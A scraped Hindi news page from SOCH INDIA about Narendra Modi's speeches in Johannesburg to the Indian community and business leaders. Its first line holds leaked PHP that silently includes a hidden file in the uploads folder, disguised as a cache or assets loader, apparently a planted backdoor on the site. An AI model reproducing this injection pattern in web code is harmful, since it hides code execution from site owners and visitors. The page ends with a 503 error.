add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अब जोहानिसबर्ग में छाया मोदी का जादू, मोदी-मोदी के नारे से गूंजा परिसर – SOCH INDIA
Menu

दुनिया
अब जोहानिसबर्ग में छाया मोदी का जादू, मोदी-मोदी के नारे से गूंजा परिसर

nobanner

जोहानिसबर्ग। दक्षिण अफ्रीका दौरे पर गए प्रधानमंत्री नरेंद्र मोदी जोहानिसबर्ग में भारतीय समुदाय के बीच पहुंचे। यहां उन्होंने लोगों को संबोधित करते हुए कहा कि यहां आकर मुझे बहुत हर्ष हो रहा है। उनका पारंपरिक तरीके से स्वागत किया गया। स्टेडियम में 11 हजार से भी ज्यादा लोग मौजूद हैं। पीएम के आने पर मोदी-मोदी के नारे के साथ पूरा परिसर गूंजने लगा।

पीएम मोदी यहां स्थानीय परिधान में पहुंचे। पीएम ने कहा कि आप सबके बीच आना मेरे लिए खुशी की बात है। आपसे मिलने का मुझे सौभाग्य मिला है। हमारी परंपरा हमें जोड़ती है। मोदी एप पर मुझे आपसे सुझाव मिले। सदियों पहले हमारे पूर्वज यहां आए थे। आपको देखकर पूर्वजों की पीड़ा याद आती है।

भारत दक्षिण अफ्रीका को गले लगाने वाला पहला देश था। हम वसुधैव कुटुंबकम की भावना से जुड़े हुए हैं। मोदी ने कहा कि सत्याग्रह की शुरुआत साउथ अफ्रीका की धरती से ही हुई थी। दक्षिण अफ्रीका ने मोहनदास को महात्मा में बदला।

इससे पहले भारत को दुनिया की सबसे अधिक खुली अर्थव्यवस्थाओं में से एक बताते हुए प्रधानमंत्री नरेंद्र मोदी ने दक्षिण अफ्रीकी कंपनियों को निवेश के लिये आमंत्रित किया। उन्होंने अफ्रीकी कंपनियों से भारत की बदलाव यात्रा में भागीदार बनते हुये निवेश बढ़ाने तथा व्यापार में विविधता लाकर उपलब्ध अवसरों का लाभ उठाने का आह्वान किया। बाद में उन्होंने गांधी और मंडेला को श्रद्धांजलि दी।

भारत और दक्षिण अफ्रीका के शीर्ष व्यापारियों को संबोधित करते हुए उन्होंने ऐतिहासिक संबंधों को रेखांकित किया और महान नेताओं नेल्सन मंडेला तथा महात्मा गांधी का जिक्र किया। उन्होंने कंपनियों से भौगोलिक संपर्कों का भी लाभ उठाने को कहा। मोदी ने कहा कि दोनों देशों में वृद्धि एवं विकास के लिये दक्षिण अफ्रीकी व्यापार उत्कृष्ठता तथा भारत में उपलब्ध क्षमताओं को एक-दूसरे के फायदे के लिये उपयोग में लाया जाना चाहिये। भारत की खूबियों को रेखांकित करते हुए उन्होंने इसे वैश्विक अर्थव्यवस्था में आकषर्क स्थान बताया। उन्होंने 7.6 प्रतिशत की उच्च आर्थिक वृद्धि का जिक्र करते हुये अनुकूल माहौल में कारोबार सुगमता में सुधार के लिये किये जा रहे प्रयासों के बारे में बताया।

मोदी ने व्यापार बैठक में कहा कि नेल्सन मंडेला तथा महात्मा गांधी जैसे हमारे नेताओं ने हमारे लिये राजनीतिक आजादी हासिल की। अब आर्थिक आजादी का समय आ गया है। इस प्रकार, हमारा संबंध हमारे लोगों की आकांक्षों को पूरा करने की साझी इच्छा पर आधारित है। बैठक में दक्षिण अफ्रीका के राष्ट्रपति जैकब जुमा के साथ व्यापार एवं उद्योग जगत के करीब 500 दिग्गज मौजूद थे। उन्होंने कहा कि हम संकट में मित्र रहे हैं। अब हमें अवसरों का लाभ उठाना चाहिए।

इसके बाद मोदी ने महात्मा गांधी और नेल्सन मंडेला को श्रद्धांजलि दी तथा रंगभेद विरोधी क्रांतिकारियों के परिजनों से मुलाकात की। विदेश मंत्रालय के प्रवक्ता विकास स्वरूप ने एक ट्वीट किया कि न्याय के लिए अद्भुत संघर्ष के जीवंत इतिहास के बीच प्रधानमंत्री नरेन्द्र मोदी ने रंगभेद विरोधी क्रांतिकारियों और परिजनों से मुलाकात की।

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.